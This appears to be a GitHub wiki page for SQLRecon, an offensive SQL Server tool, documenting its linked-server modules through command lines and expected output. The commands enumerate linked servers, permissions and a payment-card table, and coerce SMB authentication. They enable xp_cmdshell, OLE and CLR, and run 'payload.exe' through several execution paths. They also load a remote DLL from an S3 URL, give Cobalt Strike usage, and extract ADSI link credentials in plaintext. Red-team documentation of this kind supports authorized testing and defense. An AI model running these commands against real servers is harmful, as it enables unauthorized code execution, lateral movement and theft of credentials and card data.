-
Notifications
You must be signed in to change notification settings - Fork 114
5. Linked Modules
Linked modules are executed against one or more instances of SQL server.
We use the links module to demonstrate that SQL01 has a link to SQL02, and SQL03.
> SQLRecon.exe /a:WinToken /h:SQL01 /m:links
[*] Executing the 'links' module on SQL01
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL02 | SQL Server | SQLNCLI | SQL02 | N/A | | |
| SQL03 | SQL Server | SQLNCLI | SQL03 | N/A | | |
As SQL01 has multiple links, we can execute modules against both linked servers. An example of this has been demonstrated in the "Info" section below.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /m:info
Expected Output:
[*] (1/2) Executing the 'info' module on SQL02 via SQL01
| Object | Value |
| ------------------------- | ------------------------------------- |
| ComputerName | SQL02 |
| DomainName | KAWALABS |
| ServicePid | 2612 |
| rpc_OsMachineType | ServerNT |
| rpc_OsVersion | Windows Server 2022 Standard |
| SqlServerServiceName | MSSQLSERVER |
| rpc_SqlServiceAccountName | KAWALABS\mssql_svc |
| rpc_AuthenticationMode | Windows and SQL Server Authentication |
| rpc_ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | sa |
| ActiveSessions | 1 |
[*] (2/2) Executing the 'info' module on SQL03 via SQL01
| Object | Value |
| ------------------------- | ------------------------------------- |
| ComputerName | SQL03 |
| DomainName | KAWALABS |
| ServicePid | 1920 |
| rpc_OsMachineType | ServerNT |
| rpc_OsVersion | Windows Server 2022 Standard |
| SqlServerServiceName | MSSQLSERVER |
| rpc_SqlServiceAccountName | NT Service\MSSQLSERVER |
| rpc_AuthenticationMode | Windows and SQL Server Authentication |
| rpc_ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | sa |
| ActiveSessions | 37 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:whoami
Expected Output:
Executing the 'whoami' module on SQL02 via SQL01
[*] Logged in as sa
[*] Mapped to the user dbo
[*] Server Permissions:
| permission_name |
| --------------------------------------------- |
| CONNECT SQL |
| SHUTDOWN |
| CREATE ENDPOINT |
| CREATE ANY DATABASE |
| CREATE AVAILABILITY GROUP |
| CREATE LOGIN |
| ALTER ANY LOGIN |
| ALTER ANY CREDENTIAL |
| ALTER ANY ENDPOINT |
| ALTER ANY LINKED SERVER |
| ALTER ANY CONNECTION |
| ALTER ANY DATABASE |
| ALTER RESOURCES |
| ALTER SETTINGS |
| ALTER TRACE |
| ALTER ANY AVAILABILITY GROUP |
| ADMINISTER BULK OPERATIONS |
| AUTHENTICATE SERVER |
| EXTERNAL ACCESS ASSEMBLY |
| VIEW ANY DATABASE |
| VIEW ANY SECURITY DEFINITION |
| VIEW ANY PERFORMANCE DEFINITION |
| VIEW ANY DEFINITION |
| VIEW SERVER SECURITY STATE |
| VIEW SERVER PERFORMANCE STATE |
| VIEW SERVER STATE |
| CREATE DDL EVENT NOTIFICATION |
| CREATE TRACE EVENT NOTIFICATION |
| ALTER ANY EVENT NOTIFICATION |
| ALTER SERVER STATE |
| UNSAFE ASSEMBLY |
| ALTER ANY SERVER AUDIT |
| CREATE SERVER ROLE |
| ALTER ANY SERVER ROLE |
| CREATE ANY EVENT SESSION |
| DROP ANY EVENT SESSION |
| ALTER ANY EVENT SESSION OPTION |
| ALTER ANY EVENT SESSION ADD EVENT |
| ALTER ANY EVENT SESSION DROP EVENT |
| ALTER ANY EVENT SESSION ENABLE |
| ALTER ANY EVENT SESSION DISABLE |
| ALTER ANY EVENT SESSION ADD TARGET |
| ALTER ANY EVENT SESSION DROP TARGET |
| ALTER ANY EVENT SESSION |
| CONNECT ANY DATABASE |
| IMPERSONATE ANY LOGIN |
| SELECT ALL USER SECURABLES |
| VIEW ANY CRYPTOGRAPHICALLY SECURED DEFINITION |
| VIEW ANY ERROR LOG |
| VIEW SERVER SECURITY AUDIT |
| CONTROL SERVER |
[*] Database Permissions:
| permission_name |
| -------------------------------------------- |
| CREATE TABLE |
| CREATE VIEW |
| CREATE PROCEDURE |
| CREATE FUNCTION |
| CREATE RULE |
| CREATE DEFAULT |
| BACKUP DATABASE |
| BACKUP LOG |
| CREATE DATABASE |
| CREATE TYPE |
| CREATE ASSEMBLY |
| CREATE XML SCHEMA COLLECTION |
| CREATE SCHEMA |
| CREATE SYNONYM |
| CREATE AGGREGATE |
| CREATE ROLE |
| CREATE MESSAGE TYPE |
| CREATE SERVICE |
| CREATE CONTRACT |
| CREATE REMOTE SERVICE BINDING |
| CREATE ROUTE |
| CREATE QUEUE |
| CREATE SYMMETRIC KEY |
| CREATE ASYMMETRIC KEY |
| CREATE EXTERNAL LANGUAGE |
| CREATE EXTERNAL LIBRARY |
| CREATE FULLTEXT CATALOG |
| CREATE CERTIFICATE |
| CREATE DATABASE DDL EVENT NOTIFICATION |
| CREATE USER |
| CONNECT |
| CONNECT REPLICATION |
| CHECKPOINT |
| SUBSCRIBE QUERY NOTIFICATIONS |
| AUTHENTICATE |
| SHOWPLAN |
| ALTER ANY USER |
| ALTER ANY ROLE |
| ALTER ANY APPLICATION ROLE |
| ALTER ANY COLUMN ENCRYPTION KEY |
| ALTER ANY COLUMN MASTER KEY |
| ALTER ANY SCHEMA |
| ALTER ANY ASSEMBLY |
| ALTER ANY DATABASE SCOPED CONFIGURATION |
| ALTER ANY DATASPACE |
| ALTER ANY EXTERNAL DATA SOURCE |
| ALTER ANY EXTERNAL FILE FORMAT |
| ALTER ANY EXTERNAL LIBRARY |
| ALTER ANY EXTERNAL LANGUAGE |
| ALTER ANY EXTERNAL STREAM |
| ALTER ANY EXTERNAL JOB |
| ALTER ANY MESSAGE TYPE |
| ALTER ANY CONTRACT |
| ALTER ANY SERVICE |
| ALTER ANY REMOTE SERVICE BINDING |
| ALTER ANY ROUTE |
| ALTER ANY FULLTEXT CATALOG |
| ALTER ANY SYMMETRIC KEY |
| ALTER ANY ASYMMETRIC KEY |
| ALTER ANY CERTIFICATE |
| ALTER ANY SECURITY POLICY |
| SELECT |
| INSERT |
| UPDATE |
| DELETE |
| REFERENCES |
| EXECUTE |
| ALTER ANY DATABASE DDL TRIGGER |
| ALTER ANY DATABASE EVENT NOTIFICATION |
| ALTER ANY DATABASE AUDIT |
| CREATE ANY DATABASE EVENT SESSION |
| DROP ANY DATABASE EVENT SESSION |
| ALTER ANY DATABASE EVENT SESSION OPTION |
| ALTER ANY DATABASE EVENT SESSION ADD EVENT |
| ALTER ANY DATABASE EVENT SESSION DROP EVENT |
| ALTER ANY DATABASE EVENT SESSION ENABLE |
| ALTER ANY DATABASE EVENT SESSION DISABLE |
| ALTER ANY DATABASE EVENT SESSION ADD TARGET |
| ALTER ANY DATABASE EVENT SESSION DROP TARGET |
| ALTER ANY DATABASE EVENT SESSION |
| KILL DATABASE CONNECTION |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION |
| VIEW ANY COLUMN MASTER KEY DEFINITION |
| VIEW DATABASE SECURITY STATE |
| VIEW DATABASE PERFORMANCE STATE |
| VIEW DATABASE STATE |
| VIEW SECURITY DEFINITION |
| VIEW PERFORMANCE DEFINITION |
| VIEW DEFINITION |
| TAKE OWNERSHIP |
| ALTER |
| ALTER ANY MASK |
| UNMASK |
| EXECUTE ANY EXTERNAL SCRIPT |
| ADMINISTER DATABASE BULK OPERATIONS |
| ALTER ANY SENSITIVITY CLASSIFICATION |
| VIEW ANY SENSITIVITY CLASSIFICATION |
| VIEW CRYPTOGRAPHICALLY SECURED DEFINITION |
| ENABLE LEDGER |
| ALTER LEDGER |
| VIEW LEDGER CONTENT |
| EXECUTE ANY EXTERNAL ENDPOINT |
| VIEW DATABASE SECURITY AUDIT |
| ALTER LEDGER CONFIGURATION |
| CONTROL |
[*] Database Roles:
| Role | Membership |
| ----------------- | ---------- |
| public | Yes |
| db_owner | No |
| db_accessadmin | No |
| db_securityadmin | No |
| db_ddladmin | No |
| db_backupoperator | No |
| db_datareader | No |
| db_datawriter | No |
| db_denydatareader | No |
| db_denydatawriter | No |
| sysadmin | Yes |
| setupadmin | Yes |
| serveradmin | Yes |
| securityadmin | Yes |
| processadmin | Yes |
| diskadmin | Yes |
| dbcreator | Yes |
| bulkadmin | Yes |
SQLRecon.exe /a:WinToken /h:SQL03 /l:MECM01 /m:users
Expected Output:
[*] Executing the 'users' on MECM01 via SQL03
[*] Users in the 'master' database
| username | create_date | modify_date | type | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| KAWALABS\acon | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False | 6/7/2023 9:58:19 AM | 6/7/2023 9:58:19 AM |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False | 6/7/2023 9:37:35 AM | 6/7/2023 9:37:35 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/7/2023 9:32:08 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/6/2023 12:39:59 PM |
| NT SERVICE\MSSQLSERVER | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\mssccm_svc | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:databases
Expected Output:
[*] Executing the 'databases' on SQL02 via SQL01
| dbid | name | crdate | filename |
| ---- | -------- | -------------------- | --------------------------------------------------------------------------------- |
| 1 | master | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\master.mdf |
| 2 | tempdb | 6/13/2024 8:56:06 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\tempdb.mdf |
| 3 | model | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\model.mdf |
| 4 | msdb | 10/8/2022 6:31:57 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf |
| 5 | Payments | 4/24/2023 2:49:01 PM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\Payments.mdf |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:tables /db:Payments
Expected Output:
[*] Executing the 'tables' on SQL02 via SQL01
[*] Tables in 'Payments'
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
| ------------- | ------------ | ---------- | ---------- |
| Payments | dbo | cc | BASE TABLE |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:columns /db:Payments /table:cc
Expected Output:
[*] Executing the 'columns' on SQL02 via SQL01
[*] Displaying columns from 'Payments' in 'cc'
| COLUMN_NAME |
| ----------- |
| card_brand |
| card_num |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:rows /db:Payments /table:cc
Expected Output:
[*] Executing the 'rows' on SQL02 via SQL01
[*] Displaying number of rows from 'cc' in 'Payments'
| row_count |
| --------- |
| 31 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:search /db:Payments /keyword:card
Expected Output:
[*] Executing the 'search' on SQL02 via SQL01
[*] Searching for columns containing 'card' in 'Payments'
| table_name | column_name |
| ---------- | ----------- |
| cc | card_brand |
| cc | card_num |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:query /c:"select @@servername"
Expected Output:
[*] Executing the 'query' module on SQL02 via SQL01
[*] Executing 'select @@servername'
| column0 |
| ------- |
| SQL02 |
SQLRecon.exe /a:WinToken /h:SQL03 /l:MECM01 /m:smb /unc:\\172.16.10.10\some-path
Expected Output:
[*] Executing the 'smb' on MECM01 via SQL03
[*] Sent SMB request request
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:links
Expected Output:
[*] Executing the 'links' on SQL03 via SQL02
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | False | kawalabs\admin |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | False | sa |
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:impersonate
Expected Output:
[*] Executing the 'impersonate' on SQL03 via SQL02
| User | Can Impersonate? |
| ---- | ---------------- |
| sa | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:checkrpc
Expected Output:
Executing the 'checkrpc' module on SQL02 via SQL01
[*] The following SQL servers can have RPC configured.
| name | is_rpc_out_enabled |
| ----- | ------------------ |
| SQL02 | True |
| SQL03 | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disablexp
Expected Output:
Executing the 'disablexp' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 0 | 0 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enablexp
Expected Output:
Executing the 'enablexp' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 1 | 1 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disableole
Expected Output:
[*] Executing the 'disableole' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 0 | 0 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enableole
Expected Output:
[*] Executing the 'enableole' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 1 | 1 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disableclr
Expected Output:
[*] Executing the 'disableclr' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 0 | 0 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enableclr
Expected Output:
[*] Executing the 'enableclr' module on SQL02 via SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:xpcmd /c:'notepad'
Expected Output:
[*] Executing the 'xpcmd' on SQL02 via SQL01
Executing 'notepad'
[*] 'notepad' executed.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:olecmd /c:'c:\temp\payload.exe
Expected Output:
[*] Executing the 'olecmd' on SQL02 via SQL01
[*] Executing 'c:\temp\payload.exe'
[*] Setting sp_oacreate to 'RJXTbxom'.
[*] Setting sp_oamethod to 'QGRKvvKb'.
[+] Executed command. Destroyed 'RJXTbxom' and 'QGRKvvKb'.
A custom .NET assembly can be supplied to SQLRecon in three ways:
- Local file path
- SMB file path
- HTTP/S URL
Please refer to sql.cs or hollow.cs to see how to build a custom DLL that is compatible with SQL CLR attacks.
If you are looking to supply the DLL using a local file path, please note that the DLL has to reside on the compromised host. For example, if you are using a C2 framework like Cobalt Strike, you will need to:
- Upload
hollow.dll
to the system you have a beacon on. - Then use
inline-ExecuteAssembly
orexecute-assembly
to executeSQLRecon
. The location of the DLL on disk should be passed into the/dll:
flag. The function which you want executed should be passed into the/function:
flag. - You can then delete the DLL after the command has run.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:clr /dll:'c:\temp\sql.dll' /function:CustomFunctionName
Expected Output:
[*] Executing the 'clr' on SQL02 via SQL01
[*] c:\temp\sql.dll is 3584 bytes.
[+] Added SHA-512 hash for 'c:\temp\sql.dll' as a trusted assembly with a random name of 'wbNcSmWK'.
[+] Loaded DLL into a new custom assembly called 'egCmEOab'.
[+] Added the 'egCmEOab' assembly into a new stored procedure called 'CustomFunctionName'.
[*] Executing payload ...
[*] Cleaning up. Deleting assembly 'egCmEOab', stored procedure 'CustomFunctionName' and trusted assembly hash 'wbNcSmWK'.
You can also supply the location of a DLL to SQLRecon
via a HTTP or HTTPS link. In the example below, I've uploaded sql.dll
to an AWS S3 bucket and created a temporary pre-signed URL.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:clr /dll:"https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>" /function:CustomFunctionName
Expected Output:
[*] Executing the 'clr' module on SQL01
[+] Downloading DLL from: https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>
[+] DLL is 3584 bytes.
[+] Added SHA-512 hash for 'https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>' as a trusted assembly with a random name of 'pOSvCPBU'.
[+] Loaded DLL into a new custom assembly called 'kTMflwIP'.
[+] Added the 'kTMflwIP' assembly into a new stored procedure called 'CustomFunctionName'.
[+] Executing payload ...
[+] Cleaning up. Deleting assembly 'kTMflwIP', stored procedure 'CustomFunctionName' and trusted assembly hash 'wbNcSmWK'.
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:agentstatus
Expected Output:
[*] Executing the 'agentstatus' on SQL03 via SQL02
[*] SQL agent is running on SQL03.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:agentcmd /subsystem:cmdexec /command:'c:\temp\payload.exe
Expected Output:
[*] Executing the 'agentcmd' on SQL02 via SQL01
[*] Executing 'c:\temp\payload.exe' using the 'cmdexec' subsystem.
[*] Setting job_name to 'NLjyPukm'.
[*] Setting step_name to 'ksXgRDmg'.
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| 06f09afa-6625-4b6d-9e86-b4d7a688e9ea | NLjyPukm | 1 | 7/2/2024 8:25:15 AM | 7/2/2024 8:25:15 AM |
[*] Executing job 'NLjyPukm' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
[+] Deleting job 'NLjyPukm' on SQL02.
PowerShell is the default Agent Job subsystem.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:agentcmd /c:'c:\temp\payload.exe'
Expected Output:
[*] Executing the 'agentcmd' on SQL02 via SQL01
[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.
[*] Setting job_name to 'czuXmwBD'.
[*] Setting step_name to 'pKCxRKlE'.
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| e2880b29-5b31-4871-883e-01f10e7045c2 | czuXmwBD | 1 | 7/2/2024 8:25:23 AM | 7/2/2024 8:25:23 AM |
[*] Executing job 'czuXmwBD' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
[+] Deleting job 'czuXmwBD' on SQL02.
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:adsi /adsi:linkadsi /lport:30000
Expected Output:
[*] Executing the 'adsi' on SQL03 via SQL02
[*] Obtaining ADSI credentials for 'linkadsi'
[+] Added SHA-512 hash for LDAP server assembly to sys.trusted_assemblies with a random name of 'QzAwNXGi'.
[+] Loaded LDAP server assembly into a new custom assembly called 'ldapServer'.
[+] Added the 'ldapServer' assembly into a new stored procedure called 'JgLpQmhd'.
[*] Starting a local LDAP server on port 30000.
[*] Executing LDAP solicitation ...
[+] Obtained ADSI link credentials
|-> kawalabs\admin:Password123
[*] Cleaning up. Deleting LDAP server assembly 'ldapServer', stored procedure 'JgLpQmhd' and trusted assembly hash 'QzAwNXGi'.
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:users /debug
Expected Output:
[*] Debug mode enabled. No SQL queries will be executed.
[DEBUG] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL02
|-> /link:SQL03
|-> /module:users
|-> /debug:
[DEBUG] Connecting to 'master' on SQL02:1433 using wintoken.
|-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL02,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: ed1c84c1-6580-4ca4-b7f0-c5b9040801e7
|-> Application Name: DESKTOP-LF8Q3C6
[DEBUG] Module: users
|-> Number of required standard arguments: 0
|-> Number of required impersonate arguments: 1
|-> Number of required linked arguments: 2
[DEBUG] Context Selected: Linked
|-> Module: users
|-> Number of required arguments: 2
[*] Executing the 'users' on SQL03 via SQL02
[*] Users in the 'master' database
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''A'', ''R'', ''X'') AND sid IS NOT null AND name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
[*] Server principals
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:users /verbose
Expected Output:
[VERBOSE] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL02
|-> /link:SQL03
|-> /module:users
|-> /verbose:
[VERBOSE] Connecting to 'master' on SQL02:1433 using wintoken.
|-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL02,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 76ea3f02-71e1-4a3c-a067-fc614d483703
|-> Application Name: DESKTOP-LF8Q3C6
[*] Executing the 'users' on SQL03 via SQL02
[VERBOSE] Query:
|-> SELECT name FROM sys.servers WHERE is_linked = 1;
[*] Users in the 'master' database
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''A'', ''R'', ''X'') AND sid IS NOT null AND name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
| username | create_date | modify_date | type | authentication_type |
| -------- | ------------------- | ------------------- | -------- | ------------------- |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
| name | type_desc | is_disabled | create_date | modify_date |
| ------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/20/2024 10:12:07 AM |
| BUILTIN\Users | WINDOWS_GROUP | False | 5/29/2024 11:52:55 AM | 5/29/2024 11:52:55 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 5/29/2024 11:43:40 AM | 5/29/2024 11:43:40 AM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT Service\MSSQLSERVER | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| KAWALABS\admin | WINDOWS_LOGIN | False | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:39 AM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |